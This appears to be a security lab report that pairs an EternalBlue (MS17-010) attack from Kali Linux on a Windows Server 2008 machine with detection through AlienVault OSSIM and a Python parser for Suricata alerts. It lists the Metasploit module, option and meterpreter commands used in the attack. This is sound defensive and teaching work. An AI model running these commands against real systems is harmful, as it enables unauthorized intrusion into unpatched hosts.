Scenario:
In this report, we explore the exploitation of the EternalBlue vulnerability by an attacker using Kali Linux. We detail the attacker's progression from initial access to the execution of privilege escalation techniques to attain administrative access. With administrative privilege, the attacker can fully compromise the system: exploring sensitive data, disrupting critical operations, and maintaining persistent access for future attacks.
Environment:
Kali Linux (Attacker)
Windows Server 2008 (Victim Machine)
AlienVault Server (AlienVault OSSIM)
AlienVault OSSIM:
AlienVault OSSIM (Open-Source Security Information and Event Management) is a comprehensive security monitoring and management solution. It offers a unified approach to threat detection, incident response, and compliance management. In this report it also covers:
• Log collection and analysis
• Centralized logging's role in threat detection
• Crafting detection rules specific to exploits
• AlienVault References: https://cybersecurity.att.com/
Steps to Install and Configure AlienVault
1. Download AlienVault OSSIM from https://cybersecurity.att.com/products/ossim
2. Create a new VM using the downloaded ISO file.
3. Set the hostname as below.
4. Configure the listening interfaces.
5. Once AlienVault is installed, the welcome page appears as below; set your credentials to proceed further.
6. Set HIDS and logging as per requirement.
7. Once the configuration is completed, you will see the welcome page as below.
Steps to gain access using the EternalBlue vulnerability
1. Log in to Kali Linux and execute msfconsole.
2. Use the EternalBlue exploit module and set its options accordingly:
> use exploit/windows/smb/ms17_010_eternalblue
> show options
> set LHOST attacker_IP
> set RHOST victim_IP
3. Run the exploit using:
> exploit
4. Execute enumeration commands to see the victim machine's information:
meterpreter> getuid
meterpreter> sysinfo
meterpreter> dir
Steps to detect the exploit using AlienVault
Once the exploit is executed, you can see the alerts in AlienVault as below.
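As an added example (not part of this report or of AlienVault's own code), the following Python checker applies the detection idea above to Suricata-style fast.log lines, assuming that is the NIDS format feeding the SIEM; the sample lines, signature ids and addresses are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Suricata fast.log layout, assumed here as the NIDS feed into the SIEM:
# "<ts>  [**] [gid:sid:rev] <msg> [**] [Classification: ...] [Priority: n] {proto} src:port -> dst:port"
FAST_LOG = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]"
    r"(?:\s+\[Classification:[^\]]*\])?\s+\[Priority:\s*(?P<prio>\d+)\]\s+\{(?P<proto>\w+)\}\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s*$"
)
SMB_PORTS = {445, 139}                          # EternalBlue abuses the SMB service
MS17_010_MARKERS = ("MS17-010", "ETERNALBLUE")  # substrings found in the signature names

def parse_fast_log(line):
    """Parse one fast.log line into a dict; return None for lines that do not match."""
    m = FAST_LOG.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%m/%d/%Y-%H:%M:%S.%f")
    for key in ("sid", "prio", "sport", "dport"):
        rec[key] = int(rec[key])
    return rec

def is_eternalblue_alert(rec):
    """True when the signature names MS17-010/EternalBlue and the destination port is SMB."""
    msg = rec["msg"].upper()
    return rec["dport"] in SMB_PORTS and any(k in msg for k in MS17_010_MARKERS)

def summarize_eternalblue(lines):
    """Group matching alerts per (attacker, victim) pair: count, signature ids, first/last seen."""
    hits = defaultdict(lambda: {"count": 0, "sids": set(), "first": None, "last": None})
    for line in lines:
        rec = parse_fast_log(line)
        if rec is None or not is_eternalblue_alert(rec):
            continue  # unparseable line or an unrelated signature
        h = hits[(rec["src"], rec["dst"])]
        h["count"] += 1
        h["sids"].add(rec["sid"])
        h["first"] = rec["ts"] if h["first"] is None else min(h["first"], rec["ts"])
        h["last"] = rec["ts"] if h["last"] is None else max(h["last"], rec["ts"])
    return dict(hits)

# Constructed sample lines (not real captures); SIDs and addresses are placeholders.
SAMPLE_FAST_LOG = [
    "01/10/2024-09:05:00.000100  [**] [1:9000001:1] ET EXPLOIT Possible ETERNALBLUE Exploit M2 MS17-010 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.0.2.10:49172 -> 192.0.2.20:445",
    "01/10/2024-09:05:00.000700  [**] [1:9000002:1] ET EXPLOIT Possible ETERNALBLUE Exploit M3 MS17-010 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.0.2.10:49172 -> 192.0.2.20:445",
    "01/10/2024-09:04:10.000000  [**] [1:9000003:1] ET SCAN SMB Share Probe [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.0.2.10:40001 -> 192.0.2.20:445",
]
```

A burst of MS17-010 signatures from one source against port 445 of one host, as summarize_eternalblue() reports, is the network-side event behind the AlienVault alert; confirm it against that host's HIDS logs before treating it as a compromise.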